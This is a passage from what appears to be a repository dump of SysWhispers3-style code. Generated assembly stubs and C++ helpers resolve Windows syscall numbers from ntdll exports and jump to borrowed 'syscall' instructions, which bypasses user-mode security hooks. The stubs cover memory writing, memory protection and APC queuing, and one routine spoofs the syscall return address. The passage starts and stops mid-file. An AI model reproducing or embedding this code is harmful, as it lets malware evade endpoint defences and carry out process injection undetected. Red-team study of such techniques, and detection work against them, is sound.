syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 018BE9C9Fh ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtResumeThread ENDP\r\n\r\nNtGetContextThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 017304B00h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 017304B00h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtGetContextThread ENDP\r\n\r\nNtSetContextThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0B0A8F400h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 0B0A8F400h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtSetContextThread ENDP\r\n\r\nNtClose PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 02DA5DAA8h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 02DA5DAA8h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtClose ENDP\r\n\r\nNtReadVirtualMemory PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0105EDF09h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 0105EDF09h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtReadVirtualMemory ENDP\r\n\r\nNtWriteVirtualMemory PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 007950903h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 007950903h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtWriteVirtualMemory ENDP\r\n\r\nNtAllocateVirtualMemory PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 039913313h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 039913313h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtAllocateVirtualMemory ENDP\r\n\r\nNtProtectVirtualMemory PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 01D8F0903h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 01D8F0903h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtProtectVirtualMemory ENDP\r\n\r\nNtFreeVirtualMemory PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 03DA10713h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 03DA10713h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtFreeVirtualMemory ENDP\r\n\r\nNtQuerySystemInformation PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0148A1E1Fh ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 0148A1E1Fh ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtQuerySystemInformation ENDP\r\n\r\nNtQueryDirectoryFile PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0A0B4CE7Ch ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 0A0B4CE7Ch ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtQueryDirectoryFile ENDP\r\n\r\nNtQueryInformationFile PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 05A3A34BEh ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 05A3A34BEh ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtQueryInformationFile ENDP\r\n\r\nNtQueryInformationProcess PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0C541D0C0h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 0C541D0C0h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtQueryInformationProcess ENDP\r\n\r\nNtQueryInformationThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0B48FBE21h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 0B48FBE21h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtQueryInformationThread ENDP\r\n\r\nNtCreateSection PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 01E971E05h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 01E971E05h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtCreateSection ENDP\r\n\r\nNtOpenSection PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0CE38D0D5h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 0CE38D0D5h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtOpenSection ENDP\r\n\r\nNtMapViewOfSection PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 008972E47h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 008972E47h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtMapViewOfSection ENDP\r\n\r\nNtUnmapViewOfSection PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0164DF406h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 0164DF406h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtUnmapViewOfSection ENDP\r\n\r\nNtAdjustPrivilegesToken PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 043DD4B40h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 043DD4B40h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtAdjustPrivilegesToken ENDP\r\n\r\nNtDeviceIoControlFile PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 03F3657B2h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 03F3657B2h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtDeviceIoControlFile ENDP\r\n\r\nNtQueueApcThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 03E860C37h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 03E860C37h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtQueueApcThread ENDP\r\n\r\nNtWaitForMultipleObjects PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 051256B89h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 051256B89h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtWaitForMultipleObjects ENDP\r\n\r\nend" }, { "path": "demo5/syscall3/syscall3/1.cpp", "content": "#include \"1.h\"\r\n#include \r\n\r\n#define DEBUG\r\n\r\n#define JUMPER\r\n\r\n#ifdef _M_IX86\r\n\r\nEXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {\r\n return (PVOID)__readfsdword(0xC0);\r\n}\r\n\r\n__declspec(naked) BOOL local_is_wow64(void)\r\n{\r\n __asm {\r\n mov eax, fs: [0xc0]\r\n test eax, eax\r\n jne wow64\r\n mov eax, 0\r\n ret\r\n wow64 :\r\n mov eax, 1\r\n ret\r\n }\r\n}\r\n\r\n\r\n#endif\r\n\r\n// Code below is adapted from @modexpblog. Read linked article for more details.\r\n// https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams\r\n\r\nSW3_SYSCALL_LIST SW3_SyscallList;\r\n\r\n// SEARCH_AND_REPLACE\r\n#ifdef SEARCH_AND_REPLACE\r\n// THIS IS NOT DEFINED HERE; don't know if I'll add it in a future release\r\nEXTERN void SearchAndReplace(unsigned char[], unsigned char[]);\r\n#endif\r\n\r\nDWORD SW3_HashSyscall(PCSTR FunctionName)\r\n{\r\n DWORD i = 0;\r\n DWORD Hash = SW3_SEED;\r\n\r\n while (FunctionName[i])\r\n {\r\n WORD PartialName = *(WORD*)((ULONG_PTR)FunctionName + i++);\r\n Hash ^= PartialName + SW3_ROR8(Hash);\r\n }\r\n\r\n return Hash;\r\n}\r\n\r\n#ifndef JUMPER\r\nPVOID SC_Address(PVOID NtApiAddress)\r\n{\r\n return NULL;\r\n}\r\n#else\r\nPVOID SC_Address(PVOID NtApiAddress)\r\n{\r\n DWORD searchLimit = 512;\r\n PVOID SyscallAddress;\r\n\r\n#ifdef _WIN64\r\n // If the process is 64-bit on a 64-bit OS, we need to search for syscall\r\n BYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };\r\n ULONG distance_to_syscall = 0x12;\r\n#else\r\n // If the process is 32-bit on a 32-bit OS, we need to search for sysenter\r\n BYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };\r\n ULONG distance_to_syscall = 0x0f;\r\n#endif\r\n\r\n#ifdef _M_IX86\r\n // If the process is 32-bit on a 64-bit OS, we need to jump to WOW32Reserved\r\n if (local_is_wow64())\r\n {\r\n#ifdef DEBUG\r\n printf(\"[+] Running 32-bit app on x64 (WOW64)\\n\");\r\n#endif\r\n return NULL;\r\n }\r\n#endif\r\n\r\n // we don't really care if there is a 'jmp' between\r\n // NtApiAddress and the 'syscall; ret' instructions\r\n SyscallAddress = SW3_RVA2VA(PVOID, NtApiAddress, distance_to_syscall);\r\n\r\n if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))\r\n {\r\n // we can use the original code for this system call :)\r\n#if defined(DEBUG)\r\n printf(\"Found Syscall Opcodes at address 0x%p\\n\", SyscallAddress);\r\n#endif\r\n return SyscallAddress;\r\n }\r\n\r\n // the 'syscall; ret' intructions have not been found,\r\n // we will try to use one near it, similarly to HalosGate\r\n\r\n for (ULONG32 num_jumps = 1; num_jumps < searchLimit; num_jumps++)\r\n {\r\n // let's try with an Nt* API below our syscall\r\n SyscallAddress = SW3_RVA2VA(\r\n PVOID,\r\n NtApiAddress,\r\n distance_to_syscall + num_jumps * 0x20);\r\n if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))\r\n {\r\n#if defined(DEBUG)\r\n printf(\"Found Syscall Opcodes at address 0x%p\\n\", SyscallAddress);\r\n#endif\r\n return SyscallAddress;\r\n }\r\n\r\n // let's try with an Nt* API above our syscall\r\n SyscallAddress = SW3_RVA2VA(\r\n PVOID,\r\n NtApiAddress,\r\n distance_to_syscall - num_jumps * 0x20);\r\n if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))\r\n {\r\n#if defined(DEBUG)\r\n printf(\"Found Syscall Opcodes at address 0x%p\\n\", SyscallAddress);\r\n#endif\r\n return SyscallAddress;\r\n }\r\n }\r\n\r\n#ifdef DEBUG\r\n printf(\"Syscall Opcodes not found!\\n\");\r\n#endif\r\n\r\n return NULL;\r\n}\r\n#endif\r\n\r\n\r\nBOOL SW3_PopulateSyscallList()\r\n{\r\n // Return early if the list is already populated.\r\n if (SW3_SyscallList.Count) return TRUE;\r\n\r\n#ifdef _WIN64\r\n PSW3_PEB Peb = (PSW3_PEB)__readgsqword(0x60);\r\n#else\r\n PSW3_PEB Peb = (PSW3_PEB)__readfsdword(0x30);\r\n#endif\r\n PSW3_PEB_LDR_DATA Ldr = Peb->Ldr;\r\n PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;\r\n PVOID DllBase = NULL;\r\n\r\n // Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second\r\n // in the list, so it's safer to loop through the full list and find it.\r\n PSW3_LDR_DATA_TABLE_ENTRY LdrEntry;\r\n for (LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])\r\n {\r\n DllBase = LdrEntry->DllBase;\r\n PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;\r\n PIMAGE_NT_HEADERS NtHeaders = SW3_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);\r\n PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;\r\n DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;\r\n if (VirtualAddress == 0) continue;\r\n\r\n ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)SW3_RVA2VA(ULONG_PTR, DllBase, VirtualAddress);\r\n\r\n // If this is NTDLL.dll, exit loop.\r\n PCHAR DllName = SW3_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);\r\n\r\n if ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;\r\n if ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c) break;\r\n }\r\n\r\n if (!ExportDirectory) return FALSE;\r\n\r\n DWORD NumberOfNames = ExportDirectory->NumberOfNames;\r\n PDWORD Functions = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);\r\n PDWORD Names = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);\r\n PWORD Ordinals = SW3_RVA2VA(PWORD, DllBase, ExportDirectory->AddressOfNameOrdinals);\r\n\r\n // Populate SW3_SyscallList with unsorted Zw* entries.\r\n DWORD i = 0;\r\n PSW3_SYSCALL_ENTRY Entries = SW3_SyscallList.Entries;\r\n do\r\n {\r\n PCHAR FunctionName = SW3_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);\r\n\r\n // Is this a system call?\r\n if (*(USHORT*)FunctionName == 0x775a)\r\n {\r\n Entries[i].Hash = SW3_HashSyscall(FunctionName);\r\n Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];\r\n Entries[i].SyscallAddress = SC_Address(SW3_RVA2VA(PVOID, DllBase, Entries[i].Address));\r\n\r\n i++;\r\n if (i == SW3_MAX_ENTRIES) break;\r\n }\r\n } while (--NumberOfNames);\r\n\r\n // Save total number of system calls found.\r\n SW3_SyscallList.Count = i;\r\n\r\n // Sort the list by address in ascending order.\r\n for (DWORD i = 0; i < SW3_SyscallList.Count - 1; i++)\r\n {\r\n for (DWORD j = 0; j < SW3_SyscallList.Count - i - 1; j++)\r\n {\r\n if (Entries[j].Address > Entries[j + 1].Address)\r\n {\r\n // Swap entries.\r\n SW3_SYSCALL_ENTRY TempEntry;\r\n\r\n TempEntry.Hash = Entries[j].Hash;\r\n TempEntry.Address = Entries[j].Address;\r\n TempEntry.SyscallAddress = Entries[j].SyscallAddress;\r\n\r\n Entries[j].Hash = Entries[j + 1].Hash;\r\n Entries[j].Address = Entries[j + 1].Address;\r\n Entries[j].SyscallAddress = Entries[j + 1].SyscallAddress;\r\n\r\n Entries[j + 1].Hash = TempEntry.Hash;\r\n Entries[j + 1].Address = TempEntry.Address;\r\n Entries[j + 1].SyscallAddress = TempEntry.SyscallAddress;\r\n }\r\n }\r\n }\r\n\r\n return TRUE;\r\n}\r\n\r\nEXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)\r\n{\r\n // Ensure SW3_SyscallList is populated.\r\n if (!SW3_PopulateSyscallList()) return -1;\r\n\r\n for (DWORD i = 0; i < SW3_SyscallList.Count; i++)\r\n {\r\n if (FunctionHash == SW3_SyscallList.Entries[i].Hash)\r\n {\r\n return i;\r\n }\r\n }\r\n\r\n return -1;\r\n}\r\n\r\nEXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash)\r\n{\r\n // Ensure SW3_SyscallList is populated.\r\n if (!SW3_PopulateSyscallList()) return NULL;\r\n\r\n for (DWORD i = 0; i < SW3_SyscallList.Count; i++)\r\n {\r\n if (FunctionHash == SW3_SyscallList.Entries[i].Hash)\r\n {\r\n return SW3_SyscallList.Entries[i].SyscallAddress;\r\n }\r\n }\r\n\r\n return NULL;\r\n}\r\n\r\nEXTERN_C PVOID SW3_GetRandomSyscallAddress(DWORD FunctionHash)\r\n{\r\n // Ensure SW3_SyscallList is populated.\r\n if (!SW3_PopulateSyscallList()) return NULL;\r\n\r\n DWORD index = ((DWORD)rand()) % SW3_SyscallList.Count;\r\n\r\n while (FunctionHash == SW3_SyscallList.Entries[index].Hash) {\r\n // Spoofing the syscall return address\r\n index = ((DWORD)rand()) % SW3_SyscallList.Count;\r\n }\r\n return SW3_SyscallList.Entries[index].SyscallAddress;\r\n}\r\n" }, { "path": "demo5/syscall3/syscall3/1.h", "content": "#pragma once\r\n\r\n// Code below is adapted from @modexpblog. Read linked article for more details.\r\n// https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams\r\n\r\n#ifndef SW3_HEADER_H_\r\n#define SW3_HEADER_H_\r\n\r\n#include \r\n\r\n#define SW3_SEED 0x5339C8CB\r\n#define SW3_ROL8(v) (v << 8 | v >> 24)\r\n#define SW3_ROR8(v) (v >> 8 | v << 24)\r\n#define SW3_ROX8(v) ((SW3_SEED % 2) ? SW3_ROL8(v) : SW3_ROR8(v))\r\n#define SW3_MAX_ENTRIES 500\r\n#define SW3_RVA2VA(Type, DllBase, Rva) (Type)((ULONG_PTR) DllBase + Rva)\r\n\r\n// Typedefs are prefixed to avoid pollution.\r\n\r\ntypedef struct 